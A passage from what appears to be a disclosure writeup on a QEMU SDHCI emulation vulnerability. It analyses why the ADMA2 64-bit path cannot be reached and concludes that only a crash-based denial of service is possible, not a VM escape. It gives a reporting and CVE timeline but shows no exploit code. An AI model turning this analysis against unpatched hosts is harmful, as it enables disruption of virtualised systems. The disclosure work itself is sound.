                   !(s->capareg & R_SDHC_CAPAB_BUS64BIT_MASK)) {
               trace_sdhci_error("64 bit ADMA not supported");
               break;
           }

           sdhci_do_adma(s);
           break;
    ...
}
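The condition guarding SDHC_CTRL_ADMA2_64 above can be modelled as a pure function of the capabilities value. This is a sketch only: the macro names are local to the example, and the bit positions (19 for ADMA2 support, 28 for 64-bit system bus support) are an assumption based on the capabilities register layout in the SD Host Controller specification, not something shown in this writeup.

```c
#include <stdint.h>

/* Assumed bit positions in the capabilities register. */
#define CAP_ADMA2     (1u << 19)  /* ADMA2 support */
#define CAP_BUS64BIT  (1u << 28)  /* 64-bit system bus support */

/* Mirrors the check made before sdhci_do_adma is called for ADMA2_64. */
static int adma2_64_allowed(uint64_t capareg)
{
    return (capareg & CAP_ADMA2) && (capareg & CAP_BUS64BIT);
}
```

A capabilities value with only the ADMA2 bit set fails this check, so the 64-bit descriptor path is never reached.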

The capabilities register is a read-only register that stores information about the host controller. Its default value is set from constants defined in sdhci-internal.h.

/*
* Default SD/MMC host controller features information, which will be
* presented in CAPABILITIES register of generic SD host controller at reset.
*
* support:
* - 3.3v and 1.8v voltages
* - SDMA/ADMA1/ADMA2
* - high-speed
* max host controller R/W buffers size: 512B
* max clock frequency for SDclock: 52 MHz
* timeout clock frequency: 52 MHz
*
* does not support:
* - 3.0v voltage
* - 64-bit system bus
* - suspend/resume
*/

In the default capabilities register value, the R_SDHC_CAPAB_BUS64BIT_MASK bit is unset, and the author's comment confirms that this device does not support a 64-bit system bus. That means we cannot place a buffer in physical memory above the 4GB boundary. With these limitations and conditions, we cannot build a full exploit such as a VM escape from this vulnerability. We only have an exploit that performs a DoS by making QEMU crash and exit.

Timeline

  • 2020-12-28 Reported to Vendor
  • 2021-03-09 Vendor assigned CVE